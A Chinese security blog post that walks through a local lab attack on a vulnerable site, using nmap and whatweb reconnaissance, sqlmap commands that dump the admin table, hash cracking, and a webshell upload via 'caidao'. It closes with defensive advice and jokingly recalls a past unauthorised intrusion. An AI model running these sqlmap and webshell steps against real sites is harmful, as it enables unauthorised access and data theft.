![ac4c7e4f690b7af0b68afd1de3b3fd9e.png](https://i-blog.csdnimg.cn/blog_migrate/c6359c8f475137cc0a009391d894d93f.png)
其实啊,你的网络这么差劲!
(备注:大神如果想喷请通过私人微信,可接受冲击波攻击)
仅使用本地测试,非网络攻击行为。
本文关键字:安全,网络,kali,sqlmap
入侵你的网站,与你何干,仅仅只是好玩罢了!
(改编自—刘慈欣语录)
仔细听.........有人潜伏在你的背后!
一、简单聊聊?
你是不是想问,我有必要关注安全吗?
你不关注,那某些人就很开心了!
你们的数据我随便跑,简单到什么地步呢?
一套kali工具就可以让你 欲仙欲死,抱歉,说错了,是,让你 痛不欲生!(不小心就给你网站玩死了,你的业务呵呵哒。。。)
这种情况很有可能只是菜鸟很平常的行为,高级点的很少会玩坏你的网站,他只会获取你网站的权限,进而拿下你的这台服务器,再牛逼的,通过这台服务器辐射到你的内网,后果自己想去。
什么,你说你不信?等着,给你简单说说——到底怎么个简单法!
谷歌浏览器,利用关键字就可以搜索到一片存在注入漏洞的网站,如果你的网站很不幸被检索到,那么.......
针对这个网站搜集信息,手段么,kali自带的n多小工具,插播一句,
kali,你值得拥有!
nmap扫描啊,我擦,这么多开放端口;
whatweb,我擦,服务器的类型是这样子的啊,网站是这种的啊,语言是这种啊(脑袋里面转过一圈针对这种类型的攻破技巧)。。
作为小菜鸡的我居然感到无聊了.......这么简单!!!!
我对着网站一顿点点点,通过简单的手工测试找到貌似可执行的注入点,然后sqlmap一顿搞,ok你的管理员账号/密码到手,抱歉说错了,是你的数据库到手,里面的信息,哇....好多啊,神奇的是居然管理员的QQ号都有。。。
![006aef37473a18332af8b371afe829ef.png](https://i-blog.csdnimg.cn/blog_migrate/d54787f52ae4534ffe9fb48633fc76dc.jpeg)
“你又不知道我的后台页面”,这个真的是不要太简单啊!
一个类似御剑扫描小软件就可以简简单单把你的后台跑出来,唯一复杂的操作就是需要复制,粘贴你的域名。
好了,现在使用账号密码填入你的后台页面,真是一览无遗。
ok,现在终于提起点精神了,想办法上传带有木马的图片等,再拿我可爱的菜刀软件,咔的连接上去,这种感觉.......
都说光说不练假把式。那好,我本地搭建环境走一遍。
(公网是万万不会的,请默念三遍 小编是菜鸡,是鸡菜,菜鸡.....)
走一遍
1.配置环境
(1)准备说明
phpstudy+带有漏洞的网站+kali工具一套+跑后台软件
(2)网站账户名密码简单设置(证明后期操作结果)
![b036d0564ac5e0d3e3971e32b0001b35.png](https://i-blog.csdnimg.cn/blog_migrate/cabc1dcf53ae88c5dfa132ee7f59c076.png)
admin/admin
(3)网站架设成功
![89e9f33541a3da60e226da8336c47ff4.png](https://i-blog.csdnimg.cn/blog_migrate/582b7ad7542a0628f96ad1cf0d2fc4b4.jpeg)
2.开始搞
(1)搜集信息
![543c84546afe5db1ebe5fd5130de4b61.png](https://i-blog.csdnimg.cn/blog_migrate/092b47aa7809bd894b1f3375827620c9.jpeg)
端口信息
![51f8898b687dd78ee9f5b02e4f2bd4e0.png](https://i-blog.csdnimg.cn/blog_migrate/16dab7197ccbbd6c2ea10026ad1f5792.jpeg)
服务器信息
![50b4d9d3304f4199a93b5577d5d40dd8.png](https://i-blog.csdnimg.cn/blog_migrate/7b04fcd4bda94c79bdec66a164b7cf48.png)
后台信息
(2)注入点查找
野蛮点击,看见id进行1=1和1=2测试,不一致直接扔到kali,利用命令sqlmap -u http://test.com --dbs 读数据库,结果当然失败,因为那个链接不存在注入,继续找,想了想,还是上工具吧。
![3a6d23bf53acbd863ea6ea3feda99881.png](https://i-blog.csdnimg.cn/blog_migrate/1b186454784aa4d85e4f1d54aba49349.jpeg)
![2f91574617f52c777a6f908e79dfab57.png](https://i-blog.csdnimg.cn/blog_migrate/2270c933c93915ed6001cd0a733e472e.jpeg)
![51d52d37b0e4d53172ae90b102c8fe59.png](https://i-blog.csdnimg.cn/blog_migrate/da3e0cc2115f3772541b5f9199c81ada.jpeg)
(3)直接扔到sqlmap进行跑
这里进行个总体说明。
// 说明:这里写相关的sqlmap命令行入侵等内容(1)使用sqlmap注入检查命令进行验证sqlmap -u "http://www.test.com/?r=content&cid=15" (2)获取当前数据库名称
sqlmap -u http://www.test.com/?r=content&cid=15 –-current-db(3)获取当前数据库用户
sqlmap -u http://www.test.com/?r=content&cid=15 --current-user(4)获取数据库所有表
sqlmap -u http://www.test.com/?r=content&cid=15 –D seacms --tables(5)查看表中的字段
sqlmap -u http://www.test.com/?r=content&cid=15 –D seacms -T manage -- column(6)导出字段的值
sqlmap -u -D "seacms" -T manage -C user,password --dump(7)最后将密文解密,就得到了管理员密码
具体内容截图
![7280f7bff17fc2c90131d7f59f94cb8e.png](https://i-blog.csdnimg.cn/blog_migrate/3fc9458e2679cc0ab23376d984027a47.jpeg)
得到数据库名称
![ec4dd2e9b4ab2e3d76d7fe29bd0feb8a.png](https://i-blog.csdnimg.cn/blog_migrate/eff02a2369b398312262b1efdc630a5b.jpeg)
数据库所有表
经过脚指头分析,manager表里面很大可能有管理员账户和密码,接下来我们跑它。
![ae77c6d3bc9a27b159c240e07d2923c6.png](https://i-blog.csdnimg.cn/blog_migrate/cc8d6066957744ce21bdfc57adf7060b.jpeg)
看见没有,这几个字段里面必定有信息,接下来只跑user和password字段值。
![85217b87ccf9785f399c7d1cc7751623.png](https://i-blog.csdnimg.cn/blog_migrate/28d9189fa87e6007c92a81385ba8baaf.png)
现在账户密码有了,再把密文解密下。
![4f5c0465ca115b4eb39c0fcec0235fe1.png](https://i-blog.csdnimg.cn/blog_migrate/213cab2011898b1442119d1ba132601f.png)
可以登录后台并且上传木马了。。。。
![24db16d1e297ece7840522b84703162a.png](https://i-blog.csdnimg.cn/blog_migrate/83678f062b279ed1306447236b696c20.jpeg)
![63e08c7dd924fd2c30534ede942231df.png](https://i-blog.csdnimg.cn/blog_migrate/a1be6d0145ba23cf4f27d23f6b785bb2.jpeg)
菜刀来一把——
![f83c0210847cbc6327cdf6154c4fb35d.png](https://i-blog.csdnimg.cn/blog_migrate/fe424421db12b8be04cac8cdc194c05d.png)
来看看权限,不得不说一句,菜刀牛皮.......
![7d954962c49b54345eb02672bacd03fe.png](https://i-blog.csdnimg.cn/blog_migrate/548c61713670607628bccc5d9e5f941a.jpeg)
二、怎么样会变安全?
洗洗睡吧!其实怎么样都是不安全的,只能一定程度上变得安全,刷掉一批初级菜鸟,对于牛逼的高手来说,无非是从几分钟攻破变为几天,几周而已。。。!
心里是不是MMP。。。
放心啦!情况没有这么糟糕的。
你相不相信我说的这句话,我不知道,但我知道,我说这句话是用来安慰你的。
不过有句话我是认真的,一定程度上确实可以变得安全。
给你上个网络拓扑图(画了我半天)
![504bf87354d96f79ea5ee0f95f098d59.png](https://i-blog.csdnimg.cn/blog_migrate/d9c60f2ad558605802e063d5d822b191.jpeg)
看见没有,防火墙,IPS,漏扫等这些,看见的麻烦问下自己,自己有这些防护吗?
回答1:有。ok,你可以放点心了,对,就是放点心,你这个防护,已经可以阻拦掉一大批走在安全道路上的小菜鸟了。
回答2:没有。那我只能说句,你们家已经成为后花园了,我闲着没事逛逛,我无聊时候逛逛,我心情不好,给你网站传个东西。(某天你访问网站就会抓狂)
这还算好的了,网站还是可以运行,但是,遇到下手要是没有分寸的,你的网站就挂掉了。
问:你在吓我吧?
我绝不会告诉你,当我是菜鸡的时候就是这样搞的。(不要误会,现在依然是菜鸡,不过那种行为N年没做了,未经授权,即为非法)
当时真的是抱着无所谓的心态玩的。
后来,他家的网站关闭,再后来进不去了,也算提醒了他们。(暗暗自喜)
三、我要绝对的安全
别幼稚了,哪里有绝对的安全!
网站代码总会存在漏洞的。
硬件设备总会产生这样或者那样的问题。
管理人员总会因为意识不到位,导致产生安全事件。
你只能退而求其次,一定限度的去保障自己网络的安全,从而保护自己的资产安全。
怎么个限度法?
1、增加安全设备(我直说了,你花钱把)
安全厂商有哪些呢?
列举些:天融信,启明星辰,山石网科,深信服等......
2、设备,系统入手
你说什么?还要安全意识。
设备???系统???
没错,等我喝口水慢慢说。
曾经为企业上门,看到了很搞笑的一种状况,电脑屏幕上面贴着账户和密码,当时惊为天人,但是我不说!
曾经为企业上门调试设备,又看到了搞笑的一种状况,数通等设备的登录名和密码是厂家默认的,基本的设备防护功能也没有开启,类似dhcp snooping这种,当时感叹人生,但是我不说!
曾经也是调试过系统,还是那句话,很搞笑,系统的一些基本防护措施依然没有,又是一阵感慨,但是我还是不说!
(抱歉,上面三句是为了凑个押韵强行写的。)
然而,为了写这篇文章,我一定要说两句。
“兄弟姐妹们,上点心吧!”
可以从简单的做起,网络结构要注意进行分层次,管理网络一套,业务网络一套。
网络里面应该部署的安全防护设备,请,不要吝啬!
因为今天你的省钱行为会导致后期的数据损失。(如果钱比你企业的数据重要,那么当我没说)
![bbdd1559f5290f724cfe5647da610409.png](https://i-blog.csdnimg.cn/blog_migrate/28e751a241a664f1163df08d92c865a7.jpeg)
设备,系统等密码一定要数字,大小写交替,长度一定要够,另外的密码需要加密,否则内网环境下。一个ettercap等类似工具就可以抓取到你的传输密码信息。
类似系统防护一定要在配置文件里面顺手做了,参考这篇:Linux安全配置规范(https://mp.weixin.qq.com/s/BSdVm08YgWxh5BDUv7LXxw)
其余的具体防护,本篇不在多说,下篇再会。(备注:看心情更新,关注人不多就懒得写了)
![e5589d3a7468bfcd5a02e060e4ee2b4d.png](https://i-blog.csdnimg.cn/blog_migrate/feb6d14ec321936b118ea6eb72e5cd3d.jpeg)
你是不是想说,看起来好麻烦啊!
也有解决办法的,找专门的安全服务公司进行评估,最后出一个完整的防护方案。
今日问题:你们公司怎么搞的?